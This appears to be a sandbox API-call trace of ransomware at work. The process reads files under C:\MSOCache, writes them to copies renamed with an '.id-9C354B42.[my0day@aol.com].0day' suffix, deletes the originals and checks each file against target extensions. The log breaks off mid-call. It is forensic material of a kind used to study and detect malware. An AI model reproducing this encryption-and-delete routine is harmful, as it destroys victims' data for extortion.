SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.926] SetEndOfFile (hFile=0x188) returned 1 [0040.055] CloseHandle (hObject=0x188) returned 1 [0040.055] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0040.056] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 1 [0040.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.056] lstrlenW (lpString=".doc") returned 4 [0040.056] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.056] lstrlenW (lpString=".docx") returned 5 [0040.056] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0040.056] lstrlenW (lpString=".pdf") returned 4 [0040.056] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.056] lstrlenW (lpString=".xls") returned 4 [0040.056] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.056] lstrlenW (lpString=".xlsx") returned 5 [0040.056] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0040.056] lstrlenW (lpString=".ppt") returned 4 [0040.056] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.056] lstrlenW (lpString=".zip") returned 4 [0040.056] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.056] lstrlenW (lpString=".rar") returned 4 [0040.056] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.056] lstrlenW (lpString=".bz2") returned 4 [0040.056] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.056] lstrlenW (lpString=".7z") returned 3 [0040.056] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.056] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.056] lstrlenW (lpString=".dbf") returned 4 [0040.057] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.057] lstrlenW (lpString=".1cd") returned 4 [0040.057] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.057] lstrlenW (lpString=".jpg") returned 4 [0040.057] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.057] lstrlenW (lpString=".doc") returned 4 [0040.057] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.057] lstrlenW (lpString=".docx") returned 5 [0040.057] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0040.057] lstrlenW (lpString=".pdf") returned 4 [0040.057] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.057] lstrlenW (lpString=".xls") returned 4 [0040.057] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.057] lstrlenW (lpString=".xlsx") returned 5 [0040.057] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0040.057] lstrlenW (lpString=".ppt") returned 4 [0040.057] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.057] lstrlenW (lpString=".zip") returned 4 [0040.057] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.057] lstrlenW (lpString=".rar") returned 4 [0040.057] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.057] lstrlenW (lpString=".bz2") returned 4 [0040.057] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.057] lstrlenW (lpString=".7z") returned 3 [0040.057] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.057] lstrlenW (lpString=".dbf") returned 4 [0040.057] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.057] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.058] lstrlenW (lpString=".1cd") returned 4 [0040.058] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.058] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 81 [0040.058] lstrlenW (lpString=".jpg") returned 4 [0040.058] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.058] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0040.058] lstrlenW (lpString="Proof.msi") returned 9 [0040.058] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0040.058] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=885760) returned 1 [0040.058] CloseHandle (hObject=0x188) returned 1 [0040.058] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 0x2020 [0040.058] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.058] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0040.058] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.059] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.059] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0040.113] GetLastError () returned 0x0 [0040.113] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xd8400, lpOverlapped=0x0) returned 1 [0040.174] WriteFile (in: hFile=0x198, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xd8410, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xd8410, lpOverlapped=0x0) returned 1 [0040.514] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.514] WriteFile (in: hFile=0x198, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.514] SetEndOfFile (hFile=0x198) returned 1 [0040.514] CloseHandle (hObject=0x198) returned 1 [0040.521] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.521] SetEndOfFile (hFile=0x188) returned 1 [0040.528] CloseHandle (hObject=0x188) returned 1 [0040.528] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0040.529] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1 [0040.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.529] lstrlenW (lpString=".doc") returned 4 [0040.529] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.529] lstrlenW (lpString=".docx") returned 5 [0040.529] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0040.529] lstrlenW (lpString=".pdf") returned 4 [0040.529] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.529] lstrlenW (lpString=".xls") returned 4 [0040.529] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.529] lstrlenW (lpString=".xlsx") returned 5 [0040.529] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0040.529] lstrlenW (lpString=".ppt") returned 4 [0040.529] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.529] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.529] lstrlenW (lpString=".zip") returned 4 [0040.529] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.529] lstrlenW (lpString=".rar") returned 4 [0040.529] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.529] lstrlenW (lpString=".bz2") returned 4 [0040.529] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.529] lstrlenW (lpString=".7z") returned 3 [0040.529] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.530] lstrlenW (lpString=".dbf") returned 4 [0040.530] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.530] lstrlenW (lpString=".1cd") returned 4 [0040.530] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.530] lstrlenW (lpString=".jpg") returned 4 [0040.530] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.530] lstrlenW (lpString=".doc") returned 4 [0040.530] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.530] lstrlenW (lpString=".docx") returned 5 [0040.530] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0040.530] lstrlenW (lpString=".pdf") returned 4 [0040.530] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.530] lstrlenW (lpString=".xls") returned 4 [0040.530] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.530] lstrlenW (lpString=".xlsx") returned 5 [0040.530] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0040.530] lstrlenW (lpString=".ppt") returned 4 [0040.530] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.530] lstrlenW (lpString=".zip") returned 4 [0040.530] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.530] lstrlenW (lpString=".rar") returned 4 [0040.530] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.530] lstrlenW (lpString=".bz2") returned 4 [0040.530] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.530] lstrlenW (lpString=".7z") returned 3 [0040.530] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.530] lstrlenW (lpString=".dbf") returned 4 [0040.531] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.531] lstrlenW (lpString=".1cd") returned 4 [0040.531] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0040.531] lstrlenW (lpString=".jpg") returned 4 [0040.531] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.531] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0040.531] lstrlenW (lpString="Proofing.msi") returned 12 [0040.531] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0040.531] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=868864) returned 1 [0040.531] CloseHandle (hObject=0x188) returned 1 [0040.531] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 0x2020 [0040.531] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.532] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0040.532] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.532] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.532] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0040.532] GetLastError () returned 0x0 [0040.532] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0040.920] WriteFile (in: hFile=0x198, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0040.937] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.937] WriteFile (in: hFile=0x198, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.937] SetEndOfFile (hFile=0x198) returned 1 [0040.937] CloseHandle (hObject=0x198) returned 1 [0040.944] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.944] SetEndOfFile (hFile=0x188) returned 1 [0040.952] CloseHandle (hObject=0x188) returned 1 [0040.952] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0040.952] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1 [0040.952] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.952] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.952] lstrlenW (lpString=".doc") returned 4 [0040.952] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.952] lstrlenW (lpString=".docx") returned 5 [0040.952] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0040.952] lstrlenW (lpString=".pdf") returned 4 [0040.952] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.952] lstrlenW (lpString=".xls") returned 4 [0040.952] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.952] lstrlenW (lpString=".xlsx") returned 5 [0040.952] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0040.952] lstrlenW (lpString=".ppt") returned 4 [0040.953] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.953] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.953] lstrlenW (lpString=".zip") returned 4 [0040.953] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.953] lstrlenW (lpString=".rar") returned 4 [0040.953] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.953] lstrlenW (lpString=".bz2") returned 4 [0040.953] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.953] lstrlenW (lpString=".7z") returned 3 [0040.953] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.953] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.953] lstrlenW (lpString=".dbf") returned 4 [0040.953] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.953] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.953] lstrlenW (lpString=".1cd") returned 4 [0040.953] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.953] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.953] lstrlenW (lpString=".jpg") returned 4 [0040.953] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.953] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.953] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.953] lstrlenW (lpString=".doc") returned 4 [0040.953] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0040.953] lstrlenW (lpString=".docx") returned 5 [0040.953] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0040.953] lstrlenW (lpString=".pdf") returned 4 [0040.953] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0040.953] lstrlenW (lpString=".xls") returned 4 [0040.953] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0040.953] lstrlenW (lpString=".xlsx") returned 5 [0040.953] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0040.953] lstrlenW (lpString=".ppt") returned 4 [0040.953] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0040.954] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.954] lstrlenW (lpString=".zip") returned 4 [0040.954] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0040.954] lstrlenW (lpString=".rar") returned 4 [0040.954] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0040.954] lstrlenW (lpString=".bz2") returned 4 [0040.954] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0040.954] lstrlenW (lpString=".7z") returned 3 [0040.954] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0040.954] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.954] lstrlenW (lpString=".dbf") returned 4 [0040.954] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0040.954] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.954] lstrlenW (lpString=".1cd") returned 4 [0040.954] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0040.954] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0040.954] lstrlenW (lpString=".jpg") returned 4 [0040.954] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0040.954] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0040.954] lstrlenW (lpString="OWOW32LR.cab") returned 12 [0040.954] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0040.955] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=2928955) returned 1 [0040.955] CloseHandle (hObject=0x188) returned 1 [0040.955] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020 [0040.955] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.955] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0040.955] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0040.955] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0040.955] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.956] ReadFile (in: hFile=0x188, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.184] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.184] ReadFile (in: hFile=0x188, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, 